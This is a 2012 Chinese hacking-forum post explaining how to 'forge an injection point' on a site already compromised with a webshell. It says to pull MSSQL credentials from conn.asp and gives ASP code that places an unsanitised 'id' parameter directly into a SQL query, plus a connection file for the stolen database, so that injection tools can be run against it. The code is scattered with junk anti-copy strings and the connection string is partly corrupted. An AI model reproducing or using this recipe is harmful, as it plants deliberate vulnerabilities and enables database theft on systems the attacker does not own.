中国网络渗透测试联盟

标题: 伪造注入点方法 [打印本页]

作者: admin    时间: 2012-9-13 17:53
标题: 伪造注入点方法
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
$ @# M" h4 Z0 U3 _; WASP/Visual Basic代码2 @1 f+ \/ h+ [7 v, o( S
<!--#include file="xx.asp"-->   
8 Z" {' [! }( U- M<%   
! O, e3 F- k5 p/ bset rs=server.createobject("ADODB.recordset")    . Q; ^# Y0 k) I8 x& X' Y, h/ \
id = request("id")   
6 |/ ?! q6 T8 M: |. wstrSQL = "select * from admin where id=" & id    ' C' ~, i. V+ H5 G, ~% o6 H. j! Q
rs.open strSQL,conn,1,3   
6 F( ^  z: ^% U1 U9 v# Y* `rs.close   
! x" }+ H/ w! P' B5 F%>  2 H/ g3 P/ |$ X& s2 i8 {8 h! Q
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!6 J3 f, r& f. `+ n  A+ b; W
然后就要构造一个连接数据库的文件了,代码如下:- h$ ~5 P/ Y6 w7 `5 z3 p
ASP/Visual Basic代码
6 H/ V- P: ~, g$ ]+ T<%            - r- R# j+ ^' H3 `/ ^& J9 @
strSQLServerName = "000.000.000.000"     '服务器名称或地址   
. c; E& |8 X, c' OstrSQLDBUserName = "sqlname"         '数据库帐号    0 P$ b( m" h. a: Z) z$ A9 L# _$ Z
strSQLDBPassword = "sqlpass"         '数据库密码   
# c- Z4 }3 n& g3 U, y! RstrSQLDBName = "sqldataname"           '数据库名称   
1 Z5 E. V" ^  o; ]# }8 ?6 V' lSet conn = Server.CreateObject("ADODB.Connection")   
, r* h! q; x4 |' nstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"   
9 c) G4 Y: x( Econn.open strCon   
, \! m( a% b+ a5 d1 D%>  - ^1 m/ x  o* C0 Q
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功3 r( H# q2 e! }/ I* r





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2